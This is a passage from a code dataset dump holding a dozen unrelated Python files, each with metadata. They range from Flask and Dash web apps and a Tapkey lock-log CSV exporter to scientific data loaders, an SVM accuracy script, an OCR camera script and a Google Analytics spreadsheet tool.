Impact',\n marker = {'color' : 'sienna'}\n)\n\nbeer_data2 = [bitterness2, alcohol2,i2,j2,k2,l2,m2,n2,o2,p2,q2,r2,s2,t2,u2,v2,w2,z2]\nbeer_layout2 = go.Layout(\n barmode='group',\n title = mytitle2\n)\n\nbeer_fig2 = go.Figure(data=beer_data2, layout=beer_layout2)\n\n\n########### Initiate the app\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\nserver = app.server\napp.title=tabtitle\n\n########### Set up the layout\napp.layout = html.Div(children=[\n html.H1(myheading),\n dcc.Graph(\n id='flyingdog',\n figure=beer_fig\n ),\n dcc.Graph(\n id = 'f2',\n figure=beer_fig1\n ),\n dcc.Graph(\n id = 'f3',\n figure = beer_fig2\n )\n \n ]\n)\n\nif __name__ == '__main__':\n 
app.run_server()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"44344467","text":"#\n# This module contains I/O helper classes for this project.\n#\nfrom __future__ import absolute_import, division\nfrom __future__ import print_function, unicode_literals\nimport numpy as np\n\n\ndef load_training_density(filedir):\n \"\"\"\n # Load the MD density data of the classification.\n #\n # Input\n # =====\n # `filedir`: (str) The directory containing the data.\n #\n # Return\n # =====\n # `densities`: (list) A list of 2-D arrays of the densities.\n # `labels`: (list) A list of arrays of the labels arranged as\n # (is_begnin, is_pathogenic).\n \"\"\"\n import os\n import glob\n d_shape = (32, 32, 1) # Density shape\n bp = os.path.join(filedir, 'Benign/density')\n pp = os.path.join(filedir, 'Pathogenic/density')\n bs = glob.glob(bp + '/*_density.csv')\n ps = glob.glob(pp + '/*_density.csv')\n\n # Load\n densities = []\n labels = []\n for b in bs:\n bb = np.loadtxt(b, delimiter=',', skiprows=1)[:, 1] # Get 2nd col.\n densities.append(np.reshape(bb, d_shape))\n labels.append([[[1, 0]]])\n for p in ps:\n pp = np.loadtxt(p, delimiter=',', skiprows=1)[:, 1] # Get 2nd col.\n densities.append(np.reshape(pp, d_shape))\n labels.append([[[0, 1]]])\n return np.asarray(densities), np.asarray(labels)\n\n\ndef load_training_rama(filedir, postfix='', extra=False):\n \"\"\"\n # Load the MD rama data of the classification.\n #\n # Input\n # =====\n # `filedir`: (str) The directory containing the data.\n #\n # Return\n # =====\n # `densities`: (list) A list of 2-D arrays of the densities.\n # `labels`: (list) A list of arrays of the labels arranged as\n # (is_begnin, is_pathogenic).\n # `mutants`: (list) A list of mutants.\n \"\"\"\n import os\n import glob\n import re\n # rama shape: (time_frame, protein_size, phi_psi)\n if 'TP53' in filedir:\n d_shape = (334, 217, 2)\n elif 'MLH1' in filedir:\n d_shape = (334, 346, 2)\n skip = ['M1I', 'M1K', 'M1R', 'M1T', 'M1V']\n bp = os.path.join(filedir, 'Benign/rama_csv' + postfix)\n pp = os.path.join(filedir, 'Pathogenic/rama_csv' + postfix)\n bs = glob.glob(bp + '/*_rama.csv')\n ps = glob.glob(pp + '/*_rama.csv')\n\n # Load\n densities = []\n labels = []\n mutants = []\n for b in bs:\n bb = np.loadtxt(b, delimiter=',', usecols=[0, 1]) # skip last col.\n densities.append(np.reshape(bb, d_shape).reshape(-1, d_shape[1] * d_shape[2]))\n labels.append([[[1, 0]]])\n mutants.append(re.findall('rama\\_csv%s\\/(.*)\\_rama\\.csv' % postfix, b)[0])\n for p in ps:\n m = re.findall('rama\\_csv%s\\/(.*)\\_rama\\.csv' % postfix, p)[0]\n if m in skip:\n print('Skipping', m)\n continue\n pp = np.loadtxt(p, delimiter=',', usecols=[0, 1]) # skip last col.\n densities.append(np.reshape(pp, d_shape).reshape(-1, d_shape[1] * d_shape[2]))\n labels.append([[[0, 1]]])\n mutants.append(re.findall('rama\\_csv%s\\/(.*)\\_rama\\.csv' % postfix, p)[0])\n if extra:\n wp = os.path.join(filedir, 'Benign')\n ws = glob.glob(wp + '/wildtype*_rama.csv')\n for b in ws:\n if 'None' in b:\n print('Skipping', b)\n continue\n bb = np.loadtxt(b, delimiter=',', usecols=[0, 1]) # skip last col.\n densities.append(np.reshape(bb, d_shape).reshape(-1, d_shape[1] * d_shape[2]))\n labels.append([[[1, 0]]])\n mutants.append(re.findall('Benign\\/(.*)\\_.*\\_.*ns\\_rama\\.csv', b)[0])\n return np.asarray(densities), np.asarray(labels), mutants\n\n\ndef load_vus_rama(filedir, 
postfix=''):\n \"\"\"\n # Load the MD rama data of the classification.\n #\n # Input\n # =====\n # `filedir`: (str) The directory containing the data.\n #\n # Return\n # =====\n # `densities`: (list) A list of 2-D arrays of the densities.\n # `mutants`: (list) A list of mutants.\n \"\"\"\n import os\n import glob\n import re\n # rama shape: (time_frame, protein_size, phi_psi)\n if 'TP53' in filedir:\n d_shape = (334, 217, 2)\n elif 'MLH1' in filedir:\n d_shape = (334, 346, 2)\n bp = os.path.join(filedir, 'VUS/rama_csv' + postfix)\n bs = glob.glob(bp + '/*_rama.csv')\n if 'TP53' in filedir:\n skip = ['C242G', 'V216G'] # ['K101Q']\n elif 'MLH1' in filedir:\n skip = [] # ['G181D', 'V326M', 'I50F', 'G98D', 'V16G']\n\n # Load\n densities = []\n mutants = []\n for b in bs:\n m = re.findall('rama\\_csv%s\\/(.*)\\_rama\\.csv' % postfix, b)[0]\n if m in skip:\n print('Skipping', m)\n continue\n bb = np.loadtxt(b, delimiter=',', usecols=[0, 1]) # skip last col.\n try:\n densities.append(np.reshape(bb, d_shape).reshape(-1, d_shape[1] * d_shape[2]))\n mutants.append(m)\n except ValueError:\n print('Cannot load', m)\n return np.asarray(densities), mutants\n","sub_path":"method/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"516298182","text":"import argparse\nimport yaml\nimport yaql\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--site_config', help=\"Compiled Site Level Configuration YAML file\")\n parser.add_argument('--execution_id', help=\"ID of lightweight component\")\n parser.add_argument('--output_dir', help=\"Output directory\")\n args = parser.parse_args()\n return {\n 'augmented_site_level_config_file': args.site_config,\n 'execution_id': args.execution_id,\n 'output_dir': args.output_dir\n }\n\n\ndef get_current_lightweight_component(data, execution_id):\n current_lightweight_component = None\n for lightweight_component in data['lightweight_components']:\n if lightweight_component['execution_id'] == int(execution_id):\n current_lightweight_component = lightweight_component\n break\n return current_lightweight_component\n\ndef get_spark_env_file_content(data, execution_id):\n spark_env = []\n current_lightweight_component = get_current_lightweight_component(data, execution_id)\n master_url = current_lightweight_component['config']['spark_master']\n spark_env.append(\"export SPARK_MASTER={master}:7077\".format(master=master_url))\n spark_env.append(\"export SPARK_HOME=/spark\")\n spark_env.append(\"export SPARK_CONF_DIR=\\\"${SPARK_CONF_DIR:-\\\"${SPARK_HOME}\\\"/conf}\\\"\")\n return \"\\n\".join(spark_env)\n\n\ndef get_spark_default_config_file_content(data, execution_id):\n current_lightweight_component = get_current_lightweight_component(data, execution_id)\n config = []\n config_section = current_lightweight_component['config']\n spark_eventLog_enabled = config_section['spark_eventLog_enabled']\n config.append(\"spark.eventLog.enabled {value}\".format(value=str(spark_eventLog_enabled).lower()))\n spark_ui_enabled = config_section['spark_ui_enabled']\n config.append(\"spark.ui.enabled {value}\".format(value=str(spark_ui_enabled).lower()))\n # process supplemental config\n supplemental_config = current_lightweight_component['supplemental_config']\n for config_file in supplemental_config:\n if config_file == \"spark-defaults.conf\":\n for config_value in supplemental_config['spark-defaults.conf']:\n config.append(config_value)\n 
return \"\\n\".join(config)\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n execution_id = args['execution_id']\n site_config_filename = args['augmented_site_level_config_file']\n site_config = open(site_config_filename, 'r')\n data = yaml.load(site_config)\n output_dir = args['output_dir']\n spark_default_config_file = open(\"{output_dir}/spark-defaults.conf\".format(output_dir=output_dir), 'w')\n spark_default_config_file.write(get_spark_default_config_file_content(data, execution_id))\n spark_default_config_file.close()\n\n spark_env_file = open(\"{output_dir}/spark_env.conf\".format(output_dir=output_dir), 'w')\n spark_env_file.write(get_spark_env_file_content(data, execution_id))\n spark_env_file.close()","sub_path":"sh/pre_config/pre_config.py","file_name":"pre_config.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"261223898","text":"import datetime\nfrom flask import abort, Flask, make_response, url_for, redirect, render_template, request, Response, session\nfrom authlib.flask.client import OAuth\nfrom werkzeug.contrib.fixers import ProxyFix\nfrom applicationinsights.flask.ext import AppInsights\nimport os\nimport io\nimport csv\n\napp = Flask(__name__)\n\n# Check for existence of required environment variables\nif 'APP_SECRET_KEY' not in os.environ:\n raise KeyError('APP_SECRET_KEY not found.')\nif 'TAPKEY_CLIENT_ID' not in os.environ:\n raise KeyError('TAPKEY_CLIENT_ID not found.')\nif 'TAPKEY_CLIENT_SECRET' not in os.environ:\n raise KeyError('TAPKEY_CLIENT_SECRET not found.')\nif 'TAPKEY_TOKEN_ENDPOINT' not in os.environ:\n raise KeyError('TAPKEY_TOKEN_ENDPOINT not found.')\nif 'TAPKEY_AUTHORIZATION_ENDPOINT' not in os.environ:\n raise KeyError('TAPKEY_AUTHORIZATION_ENDPOINT not found.')\nif 'TAPKEY_BASE_URI' not in os.environ:\n raise KeyError('TAPKEY_BASE_URI not found.')\n\n# Set the secret key to some random bytes\napp.secret_key = bytearray(os.environ.get('APP_SECRET_KEY'), encoding=\"utf-8\")\n\n# Apply fix for https redirects behind a proxy (required for Azure only)\napp.wsgi_app = ProxyFix(app.wsgi_app)\n\n# Application Insights (required for Azure only)\nif 'APPINSIGHTS_INSTRUMENTATIONKEY' in os.environ:\n app.config['APPINSIGHTS_INSTRUMENTATIONKEY'] = os.environ.get('APPINSIGHTS_INSTRUMENTATIONKEY')\n AppInsights(app)\n\n\ndef fetch_tapkey_token():\n return session.get('auth')\n\n\noauth = OAuth(app)\noauth.register('tapkey',\n client_id=os.environ.get('TAPKEY_CLIENT_ID'),\n client_secret=os.environ.get('TAPKEY_CLIENT_SECRET'),\n access_token_url=os.environ.get('TAPKEY_TOKEN_ENDPOINT'),\n access_token_params=None,\n authorize_url=os.environ.get('TAPKEY_AUTHORIZATION_ENDPOINT'),\n api_base_url=f\"{os.environ.get('TAPKEY_BASE_URI')}/api/v1/\",\n client_kwargs={\n 'scope': 'read:owneraccounts read:core:entities read:logs offline_access',\n },\n fetch_token=fetch_tapkey_token,\n )\noauth.init_app(app)\n\n\n@app.route('/')\ndef status():\n return 'Service is running.'\n\n\n@app.route('/tapkey')\ndef login():\n redirect_uri = url_for('authorize', _external=True)\n return oauth.tapkey.authorize_redirect(redirect_uri)\n\n\n@app.route('/tapkey/callback')\ndef authorize():\n token = oauth.tapkey.authorize_access_token()\n session['auth'] = token\n return redirect(url_for('owner_account_chooser'))\n\n\n@app.route('/export')\ndef owner_account_chooser():\n resp = oauth.tapkey.get('Owners')\n owner_accounts = resp.json()\n for owner_account in owner_accounts:\n resp = 
oauth.tapkey.get(f\"Owners/{owner_account['id']}/BoundLocks\")\n owner_account['bound_locks'] = resp.json()\n return render_template('export.html', owner_accounts=owner_accounts)\n\n\n@app.route('/download')\ndef download():\n owner_account_id = request.args.get('owner_account_id')\n bound_lock_id = request.args.get('bound_lock_id')\n\n if owner_account_id is None or bound_lock_id is None or owner_account_id.isspace() or bound_lock_id.isspace():\n abort(400)\n abort(Response('Owner Account and Bound Lock required.'))\n return\n\n # Get BoundLock details\n resp = oauth.tapkey.get(f\"Owners/{owner_account_id}/BoundLocks/{bound_lock_id}\")\n bound_lock = resp.json()\n\n # Get LogEntries for BoundLock\n resp = oauth.tapkey.get(f\"Owners/{owner_account_id}/BoundLocks/{bound_lock_id}/LogEntries?\"\n f\"$filter=logType eq 'Command' and command eq 'TriggerLock'&\"\n f\"$select=id,entryNo,lockTimestamp,receivedAt,boundCardId,contactId&\")\n log_entries = resp.json()\n\n # Get required Contacts\n contacts = []\n contact_ids = list(set(map(lambda x: x['contactId'], log_entries)))\n if not all(x is None for x in contact_ids):\n contact_ids_filter = '$filter=' + ' or '.join(map(lambda x: f\"id eq '{x}'\", contact_ids))\n resp = oauth.tapkey.get(f\"Owners/{owner_account_id}/Contacts?{contact_ids_filter}&\"\n f\"$select=id,email\")\n contacts = resp.json()\n\n # Get required BoundCards\n bound_cards = []\n bound_card_ids = list(set(map(lambda x: x['boundCardId'], log_entries)))\n if not all(x is None for x in bound_card_ids):\n bound_card_ids_filter = '$filter=' + ' or '.join(map(lambda x: f\"id eq '{x}'\", bound_card_ids))\n resp = oauth.tapkey.get(f\"Owners/{owner_account_id}/BoundCards?{bound_card_ids_filter}&\"\n f\"$select=id,title\")\n bound_cards = resp.json()\n\n output = io.StringIO()\n writer = csv.writer(output, quoting=csv.QUOTE_NONNUMERIC)\n\n # Write column names\n row = [\n 'Contact ID',\n 'Contact Email',\n 'NFC Transponder ID',\n 'NFC Transponder Title',\n 'Lock Timestamp',\n 'Entry Number',\n 'Received At',\n 'ID'\n ]\n writer.writerow(row)\n\n # Write log entries\n for entry in log_entries:\n contact = next((x for x in contacts if x['id'] == entry['contactId']), None)\n bound_card = next((x for x in bound_cards if x['id'] == entry['boundCardId']), None)\n row = [\n entry['contactId'],\n contact['email'] if contact else None,\n entry['boundCardId'],\n bound_card['title'] if bound_card else None,\n entry['lockTimestamp'],\n entry['entryNo'],\n entry['receivedAt'],\n entry['id']\n ]\n writer.writerow(row)\n response = make_response(output.getvalue())\n cd = f\"attachment; filename={bound_lock['id']}_{datetime.datetime.now().strftime('%Y-%m-%dT%H%M%S')}.csv\"\n response.headers['Content-Disposition'] = cd\n response.mimetype='text/csv'\n return response\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"466574337","text":"from app import app, db\nimport pandas\nimport numpy\nfrom flask import render_template, flash, redirect, session, url_for, request, g\nfrom .models import User, Balance, Transactions\nfrom .forms import UploadForm\nimport sys\nfrom werkzeug.utils import secure_filename\nfrom config import UPLOAD_FOLDER\n\n\n@app.before_request\ndef before_request():\n g.user = User.query.get(1)\n\n@app.route('/', methods=['GET', 'POST'])\n@app.route('/index', methods=['GET', 'POST'])\ndef index():\n user = g.user\n balance = 
g.user.get_balance()\n form = UploadForm()\n return render_template('index.html',\n title='Home',\n user=user,\n balance=balance,\n form=form)\n\n@app.route('/upload2', methods=['GET', 'POST'])\ndef upload2():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(url_for('index'))\n file = request.files['file']\n # if user does not select file, browser submits an empty part without the filename\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file:\n filename = secure_filename(file.filename)\n print(filename, file=sys.stderr)\n read = pandas.read_csv(file)\n print (file, file=sys.stderr)\n print(read, file=sys.stderr)\n flash('File Uploaded!')\n return redirect(url_for('index'))\n\n@app.route('/upload', methods=['GET', 'POST'])\ndef upload():\n form = UploadForm()\n if form.validate_on_submit():\n file = form.upload.data\n read = pandas.read_csv(file)\n print(read, file=sys.stderr)\n flash('File Uploaded!')\n return redirect(url_for('index'))\n flash('Invalid File')\n return redirect(url_for('index'))\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"388632159","text":"mesFinal = int(input(\"Até qual mês devo calcular a reprodução dos coelhos?\\n\"))\ncount = 1 \n\nanterior = 0\ninicio = 1\nprint(inicio)\nwhile count < mesFinal:\n proximo = inicio + anterior\n print(proximo)\n anterior = inicio\n inicio = proximo\n count = count + 1\n\nprint(\"Até o mês descrito( \", mesFinal, \")\\nvocê terá\", proximo, \"casais de coelhinhos\")\n\nimport time\ntime.sleep(2)","sub_path":"Scripts/12_Fibonacci.py","file_name":"12_Fibonacci.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"438953297","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom solo.models import SingletonModel\n\n\nclass FormsConfig(SingletonModel):\n organisatie_rsin = models.CharField(\n _(\"RSIN organisatie\"), max_length=9, default=\"002220647\"\n )\n\n # event permits\n zaaktype_event_permit = models.URLField(_(\"zaaktype evenementvergunning\"))\n\n class Meta:\n verbose_name = \"Applicatieconfiguratie\"\n","sub_path":"src/forms_ui/config/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"354413573","text":"import cv2\nfrom indexClass import DetextText\n\nimport os\n\nurl = 'http://192.168.1.21:8080/video'\nvc = cv2.VideoCapture(url)\nobj = DetextText()\n\ndef showCamera():\n vc = cv2.VideoCapture(url)\n\n while(True):\n try:\n ret, frame = vc.read()\n cv2.namedWindow('frame', cv2.WINDOW_NORMAL)\n cv2.resizeWindow('frame', 800, 600)\n cv2.imshow('frame',frame)\n key = cv2.waitKey(1)\n if key == 27: # exit on ESC\n print(\"Turning off camera\")\n vc.release()\n print(\"Program ended\")\n cv2.destroyAllWindows()\n exit()\n if key == 32:\n cv2.imwrite(filename='abc.jpg',img=frame)\n print(\"Turning off camera\")\n vc.release()\n print(\"Program ended\")\n cv2.destroyAllWindows()\n listDetectedWords = obj.getDetectedWords(\"abc.jpg\", True)\n text = \"\"\n for element in listDetectedWords:\n text += element\n text += ' '\n\n print(text)\n obj.toSound(listDetectedWords)\n vc = 
cv2.VideoCapture(url)\n except(KeyboardInterrupt): \n print(\"Turning off camera\")\n vc.release()\n print(\"Program ended\")\n cv2.destroyAllWindows()\n break\n\n\nshowCamera()","sub_path":"src/opencamera.py","file_name":"opencamera.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"15096643","text":"import datetime, pytz\n\nfrom docs.invoices.models import Invoice, InvoiceSent\nfrom docs.recurs.models import MetaRecur, RecurType, Recur, RecurInstance\nfrom docs.recurs.utils import create_recur_invoice\n\n\nrt = RecurType.objects.filter(name__icontains='host')[0]\nrs = RecurInstance.objects.all()\nr = Recur.objects.filter(live=1, dd=0,type=rt)\ntoday = datetime.datetime.date(datetime.datetime.now(pytz.timezone('Australia/Sydney')))\n\n \ndef find_next_start(x):\n t = datetime.timedelta(days=1)\n try:\n ro = rs.filter(recur=x).order_by('-cover_end')[0]\n next_start = ro.cover_end + t\n except:\n next_start = x.start \n return next_start\n \ndef current_hosting(gen=False): \n i = 0\n l = {}\n for x in r:\n next_due = find_next_start(x)\n m = MetaRecur.objects.get(name='check_within_days')\n d = datetime.timedelta(days=float(m.value))\n is_due = next_due-d\n try: \n ro = rs.filter(recur=x).order_by('-cover_end')[0]\n end = ro.cover_end\n except: \n end = x.start\n # TD: not convinced that the 2 things going on below shouldn't be seperated\n if is_due=0):\r\n return(1)\r\n else:\r\n return(0)\r\n\r\ndef predict_linear(X,W,b):\r\n p=[]\r\n for i in range(X.shape[0]):\r\n z=( (W[0][0]*X[i,0]) + (W[0][1]*X[i,1]) )+b\r\n p.append(signum(z))\r\n\r\n return(p)\r\n\r\ndef predict_rbf(X,alpha,sv,b,m,gamma):\r\n p=[]\r\n for i in range(X.shape[0]):\r\n z=0\r\n for j in range(m):\r\n z=z+( alpha[0][j]*rbf_kernel(X[i],sv[j],gamma) )\r\n p.append(signum(z+b))\r\n \r\n return(p)\r\n\r\ndef accuracy(X,Y):\r\n p=0\r\n t=len(X)\r\n for i in range(t):\r\n if(X[i]==Y[i]):\r\n p=p+1\r\n \r\n return((p*100)/t)\r\n\r\n\r\nfor i in range(4,6):\r\n filename=\"data_\"+str(i)+\".h5\"\r\n f=h5py.File(filename,'r')\r\n l=list(f.keys())\r\n attri=np.array(f[l[0]])\r\n label=np.array(f[l[1]])\r\n\r\n m=label.shape[0]\r\n train_size=(m*80)//100\r\n test_size=(m*20)//100\r\n\r\n training_data_X=np.delete(attri,[i for i in range(test_size) ],axis=0)\r\n training_data_Y=np.delete(label,[i for i in range(test_size) ],axis=0)\r\n testing_data_X=attri[0:test_size,:]\r\n testing_data_Y=label[0:test_size]\r\n\r\n clf=svm.SVC(kernel='linear',C=1)\r\n clf.fit(training_data_X,training_data_Y)\r\n W=clf.coef_\r\n b=clf.intercept_\r\n \r\n training_predict=predict_linear(training_data_X,W,b)\r\n testing_predict=predict_linear(testing_data_X,W,b)\r\n\r\n print(\"Data Set \"+str(i))\r\n print(\"Accuracy on training Data with implemented predict function (Linear SVM): \"+str(accuracy(training_predict,training_data_Y))) \r\n print(\"Accuracy on training Data with Sklearn predict function (Linear SVM): \"+str(clf.score(training_data_X,training_data_Y)*100))\r\n print()\r\n print(\"Accuracy on testing Data with implemented predict function (Linear SVM): \"+str(accuracy(testing_predict,testing_data_Y))) \r\n print(\"Accuracy on testing Data with Sklearn predict function (Linear SVM): \"+str(clf.score(testing_data_X,testing_data_Y)*100))\r\n print()\r\n\r\n\r\n g=1/(2*np.var(training_data_X))\r\n clf=svm.SVC(kernel='rbf',gamma='scale',C=1)\r\n clf.fit(training_data_X,training_data_Y)\r\n alpha=clf.dual_coef_\r\n 
support_vectors=clf.support_vectors_\r\n b=clf.intercept_\r\n m=sum(clf.n_support_)\r\n \r\n training_predict_rbf=predict_rbf(training_data_X,alpha,support_vectors,b,m,g)\r\n testing_predict_rbf=predict_rbf(testing_data_X,alpha,support_vectors,b,m,g)\r\n\r\n print(\"Data Set \"+str(i))\r\n print(\"Accuracy on training Data with implemented predict function (RBF Kernel): \"+str(accuracy(training_predict_rbf,training_data_Y))) \r\n print(\"Accuracy on training Data with Sklearn predict function (RBF Kernel): \"+str(clf.score(training_data_X,training_data_Y)*100))\r\n print()\r\n print(\"Accuracy on testing Data with implemented predict function (RBF Kernel): \"+str(accuracy(testing_predict_rbf,testing_data_Y))) \r\n print(\"Accuracy on testing Data with Sklearn predict function (RBF Kernel): \"+str(clf.score(testing_data_X,testing_data_Y)*100))\r\n print()\r\n","sub_path":"Assignment 2/1D.py","file_name":"1D.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"49384195","text":"# -*- coding: utf8 -*-\r\n##########################################\r\n#\r\n# Exercices en Python\r\n# Base 2 en Base 10\r\n# A.BAUDET 20/12/2019\r\n#\r\n##########################################\r\n\r\ncnbr = input('Nombre en base 2 à transposer en base 10 : ')\r\nlength = len(cnbr)\r\ni = 0\r\ncalc = 0\r\nscnbr = '0'\r\ntnbr = 0\r\nresult = 0\r\ndeb = cnbr\r\n\r\nwhile i < length:\r\n snbr = cnbr[i]\r\n tnbr = int(snbr)\r\n result = tnbr * 2 ** (length - i - 1)\r\n calc = result + calc\r\n i = i + 1\r\n\r\nprint(deb, 'en base 2 est', calc, 'en base 10.')\r\n","sub_path":"Vendredi 20-12-2019/Base2-Base10.py","file_name":"Base2-Base10.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"445524434","text":"# Ubermetrics.py\n# Contains the class corresponding to the application\n\nfrom apiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nimport httplib2\nfrom oauth2client import client\nfrom oauth2client import file\nfrom oauth2client import tools\nimport json\nimport argparse\nimport sys\nfrom datetime import date, timedelta\nimport os\n\nimport functions # Python script containing the following functions: get_service, get_value,\n# fill_spreadsheet and str_from_list\n\nfrom Cocoa import *\nfrom Foundation import NSObject\n\nclass UbermetricsController(NSWindowController):\n valueTextField = objc.IBOutlet()\n startDatePicker = objc.IBOutlet()\n endDatePicker = objc.IBOutlet()\n viewIdTextField = objc.IBOutlet()\n metricsTextField = objc.IBOutlet()\n dimensionsTextField = objc.IBOutlet()\n sortTextField = objc.IBOutlet()\n filtersTextField = objc.IBOutlet()\n maxResultsTextField = objc.IBOutlet()\n\n spreadsheetIdTextField = objc.IBOutlet()\n sheetNameTextField = objc.IBOutlet()\n rangeTextField = objc.IBOutlet()\n\n checkBoxNumericValues = objc.IBOutlet()\n\n spreadsheetIdStackField = objc.IBOutlet()\n sheetNameStackField = objc.IBOutlet()\n checkBoxSpreadsheetData = objc.IBOutlet()\n\n def windowDidLoad(self):\n NSWindowController.windowDidLoad(self)\n\n # Path to the files\n self.dirpath = str(os.getcwd()) + '/../../../../'\n\n # Define the auth scopes to request.\n scopeSheets = ['https://www.googleapis.com/auth/spreadsheets']\n scopeAnalytics = ['https://www.googleapis.com/auth/analytics.readonly']\n\n # Authenticate and construct services.\n self.serviceAnalytics = 
functions.get_service('analytics', 'v3', scopeAnalytics, self.dirpath + 'credentials.json')\n self.serviceSheets = functions.get_service('sheets', 'v4', scopeSheets, self.dirpath + 'credentials.json')\n\n # Value to display\n self.value = ''\n\n # Get previous entered values\n with open(self.dirpath + 'temp.json', 'r+') as f:\n \t self.temp = json.load(f)\n\n # Get data already in the first sheet\n self.checkBoxSpreadsheetData.setState_(int(self.temp[\"checkBoxSpreadsheetData\"]))\n self.spreadsheetIdStack = self.temp[\"spreadsheetIdStack\"]\n if self.spreadsheetIdStack != '':\n self.spreadsheetIdStackField.setStringValue_(self.spreadsheetIdStack)\n elif int(self.checkBoxSpreadsheetData.state()) == 1:\n self.spreadsheetIdStackField.setStringValue_('Spreadsheet ID - Required -')\n self.sheetNameStack = self.temp[\"sheetNameStack\"]\n if self.sheetNameStack != '':\n self.sheetNameStackField.setStringValue_(self.sheetNameStack)\n elif int(self.checkBoxSpreadsheetData.state()) == 1:\n self.sheetNameStackField.setStringValue_('Sheet name - Required -')\n\n # Arguments for getValue function\n self.viewId = self.temp[\"viewId\"]\n if self.viewId != 0:\n self.viewIdTextField.setStringValue_(self.viewId)\n\n startDateStr = self.temp[\"startDate\"].split('-')\n self.startDate = date(int(startDateStr[0]), int(startDateStr[1]), int(startDateStr[2]))\n endDateStr = self.temp[\"endDate\"].split('-')\n self.endDate = date(int(endDateStr[0]), int(startDateStr[1]), int(endDateStr[2]))\n self.startDatePicker.setDateValue_(self.startDate)\n self.endDatePicker.setDateValue_(self.endDate)\n\n self.metrics = self.temp[\"metrics\"]\n if self.metrics != '':\n self.metricsTextField.setStringValue_(self.metrics)\n\n self.dimensions = self.temp[\"dimensions\"]\n if self.dimensions != '':\n self.dimensionsTextField.setStringValue_(self.dimensions)\n self.sort = self.temp[\"sort\"]\n if self.sort != '':\n self.sortTextField.setStringValue_(self.sort)\n self.filters = self.temp[\"filters\"]\n if self.filters != '':\n self.filtersTextField.setStringValue_(self.filters)\n self.maxResults = self.temp[\"maxResults\"]\n if self.maxResults != 0:\n self.maxResultsTextField.setStringValue_(self.maxResults)\n\n # Arguments for fillSpreadsheet function\n self.spreadsheetId = self.temp[\"spreadsheetId\"]\n if self.spreadsheetId != '':\n self.spreadsheetIdTextField.setStringValue_(self.spreadsheetId)\n self.sheetName = self.temp[\"sheetName\"]\n if self.sheetName != '':\n self.sheetNameTextField.setStringValue_(self.sheetName)\n self.range = self.temp[\"range\"]\n if self.range != '':\n self.rangeTextField.setStringValue_(self.range)\n\n # Checkbox to choose to display only numeric values or no\n self.checkBoxNumericValues.setState_(int(self.temp[\"checkBoxNumericValues\"]))\n\n # self.startDatePicker.setTimeZone_(NSTimeZone.localTimeZone())\n # NSLog(str(self.startDatePicker.timeZone()))\n\n # Column values for all clients\n self.values = []\n\n @objc.IBAction\n def setStartDate_(self, sender):\n if self.startDatePicker.dateValue() <= self.endDatePicker.dateValue():\n startDatePickerValue = str(self.startDatePicker.dateValue())[:10].split('-')\n self.startDate = date(int(startDatePickerValue[0]), int(startDatePickerValue[1]), int(startDatePickerValue[2]))\n self.startDate += timedelta(days=1) # Timezone issue to deal with\n self.temp[\"startDate\"] = str(self.startDate)\n else:\n self.value = 'Choose a start date before the end date'\n self.updateDisplay()\n\n @objc.IBAction\n def setEndDate_(self, sender):\n if 
self.startDatePicker.dateValue() <= self.endDatePicker.dateValue():\n endDatePickerValue = str(self.endDatePicker.dateValue())[:10].split('-')\n self.endDate = date(int(endDatePickerValue[0]), int(endDatePickerValue[1]), int(endDatePickerValue[2]))\n self.endDate += timedelta(days=1) # Timezone issue to deal with\n self.temp[\"endDate\"] = str(self.endDate)\n else:\n self.value = 'Choose a end date after the start date'\n self.updateDisplay()\n\n @objc.IBAction\n def enterViewID_(self, sender): # Must have 7 to 9 figures to write\n if self.viewIdTextField.stringValue(): #.isnumeric()\n self.viewId = self.viewIdTextField.stringValue()\n self.temp[\"viewId\"] = str(self.viewId)\n # self.value = 'Enter a number please'\n else:\n self.viewId = 0\n self.temp[\"viewId\"] = str(self.viewId)\n self.updateDisplay()\n\n @objc.IBAction\n def enterMetrics_(self, sender):\n if self.metricsTextField.stringValue():\n self.metrics = self.metricsTextField.stringValue()\n self.temp[\"metrics\"] = str(self.metrics)\n # self.value = 'This metric does not exist'\n else:\n self.metrics = \"\"\n self.temp[\"metrics\"] = str(self.metrics)\n self.updateDisplay()\n\n @objc.IBAction\n def enterDimensions_(self, sender):\n if self.dimensionsTextField.stringValue():\n self.dimensions = self.dimensionsTextField.stringValue()\n self.temp[\"dimensions\"] = str(self.dimensions)\n # self.value = 'This dimension does not exist'\n else:\n self.dimensions = \"\"\n self.temp[\"dimensions\"] = str(self.dimensions)\n self.updateDisplay()\n\n @objc.IBAction\n 